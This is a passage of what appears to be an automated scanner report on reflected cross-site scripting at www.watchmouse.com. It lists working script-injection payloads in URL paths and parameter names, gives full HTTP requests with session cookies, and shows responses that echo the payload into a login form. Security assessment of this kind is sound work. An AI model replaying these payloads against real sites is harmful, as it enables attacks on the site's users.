The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1966a"><script>alert(1)</script>2b96432b910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/customers.php?1966a"><script>alert(1)</script>2b96432b910=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3873c08ccf8d7ade8ffe865e0fc8e8ec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/customers.php?1966a"><script>alert(1)</script>2b96432b910=1" method="post">
...[SNIP]...

1.103. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9592d"><script>alert(1)</script>b63bab14314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9592d"><script>alert(1)</script>b63bab14314/dnstool.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-073bf9c9d846f8c7af3b8c97baa303d5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9592d"><script>alert(1)</script>b63bab14314/dnstool.php" method="post">
...[SNIP]...

1.104. http://www.watchmouse.com/en/dnstool.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4b5"><script>alert(1)</script>24304328954 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/dnstool.php6f4b5"><script>alert(1)</script>24304328954 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-1925403abb8e671cf92d9c02a293d684"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13046

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dnstool.php6f4b5"><script>alert(1)</script>24304328954" method="post">
...[SNIP]...

1.105. http://www.watchmouse.com/en/dnstool.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/dnstool.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e54b0"><script>alert(1)</script>735acd9f680 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/dnstool.php?e54b0"><script>alert(1)</script>735acd9f680=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:19 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-4922853b270660a6dc0653474470f570"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/dnstool.php?e54b0"><script>alert(1)</script>735acd9f680=1" method="post">
...[SNIP]...

1.106. http://www.watchmouse.com/en/extensions.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3535"><script>alert(1)</script>0785e62a94a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ena3535"><script>alert(1)</script>0785e62a94a/extensions.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:13 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-e3c1b9c4b1a76d36deb29788a3f24809"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/ena3535"><script>alert(1)</script>0785e62a94a/extensions.php" method="post">
...[SNIP]...

1.107. http://www.watchmouse.com/en/extensions.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 918c7"><script>alert(1)</script>80019ed55a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/extensions.php918c7"><script>alert(1)</script>80019ed55a2 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:16 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cf661187c540e58bcd8c1549a56a86d6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/extensions.php918c7"><script>alert(1)</script>80019ed55a2" method="post">
...[SNIP]...

1.108. http://www.watchmouse.com/en/extensions.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/extensions.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c17c4"><script>alert(1)</script>6b0c72a87db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/extensions.php?c17c4"><script>alert(1)</script>6b0c72a87db=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:11 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-2d64b4c2844e5fe15aa9d4a34853a4a5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31886

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/extensions.php?c17c4"><script>alert(1)</script>6b0c72a87db=1" method="post">
...[SNIP]...

1.109. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2907c"><script>alert(1)</script>72bd7cc1f73 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en2907c"><script>alert(1)</script>72bd7cc1f73/fact_sheet.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:28 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-51669068dd7c82ba7a3d2baea93931fd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13100

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en2907c"><script>alert(1)</script>72bd7cc1f73/fact_sheet.php" method="post">
...[SNIP]...

1.110. http://www.watchmouse.com/en/fact_sheet.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ec8b"><script>alert(1)</script>9f4bc5d9602 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/fact_sheet.php7ec8b"><script>alert(1)</script>9f4bc5d9602 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-a1c8f0cdfa54a7b41d8ffd2a043b6d3b"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13073

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fact_sheet.php7ec8b"><script>alert(1)</script>9f4bc5d9602" method="post">
...[SNIP]...

1.111. http://www.watchmouse.com/en/fact_sheet.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/fact_sheet.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7cf0"><script>alert(1)</script>4f05880185b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/fact_sheet.php?d7cf0"><script>alert(1)</script>4f05880185b=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:07:26 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-0d08ba2ec4ba7ab2a39cf841937838d2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 19713

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/fact_sheet.php?d7cf0"><script>alert(1)</script>4f05880185b=1" method="post">
...[SNIP]...

1.112. http://www.watchmouse.com/en/faq.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93a35"><script>alert(1)</script>18eb829f328 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en93a35"><script>alert(1)</script>18eb829f328/faq.php HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:22 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-ad9b0f0a23b1abe07f544e8b8a9c62ac"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en93a35"><script>alert(1)</script>18eb829f328/faq.php" method="post">
...[SNIP]...

1.113. http://www.watchmouse.com/en/faq.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 164ff"><script>alert(1)</script>38a62c2deed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faq.php164ff"><script>alert(1)</script>38a62c2deed HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-241840722d5252f261c6e7d81b15c4bd"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/faq.php164ff"><script>alert(1)</script>38a62c2deed" method="post">
...[SNIP]...

1.114. http://www.watchmouse.com/en/faq.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/faq.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8686e"><script>alert(1)</script>1bf3b04d33c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/faq.php?8686e"><script>alert(1)</script>1bf3b04d33c=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-cb2b491aea069184ee4baf2e11402502"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/faq.php?8686e"><script>alert(1)</script>1bf3b04d33c=1" method="post">
...[SNIP]...

1.115. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 487ba"><script>alert(1)</script>c0c36788f3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en487ba"><script>alert(1)</script>c0c36788f3f/feature/api-and-web-services-cloud-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:50 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-9f6c6655762e1bc43a3cc757d2cb5ebc"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en487ba"><script>alert(1)</script>c0c36788f3f/feature/api-and-web-services-cloud-monitoring.html" method="post">
...[SNIP]...

1.116. http://www.watchmouse.com/en/feature/api-and-web-services-cloud-monitoring.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/api-and-web-services-cloud-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b192a"><script>alert(1)</script>4a903a5d4a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/featureb192a"><script>alert(1)</script>4a903a5d4a5/api-and-web-services-cloud-monitoring.html HTTP/1.1
Host: www.watchmouse.com
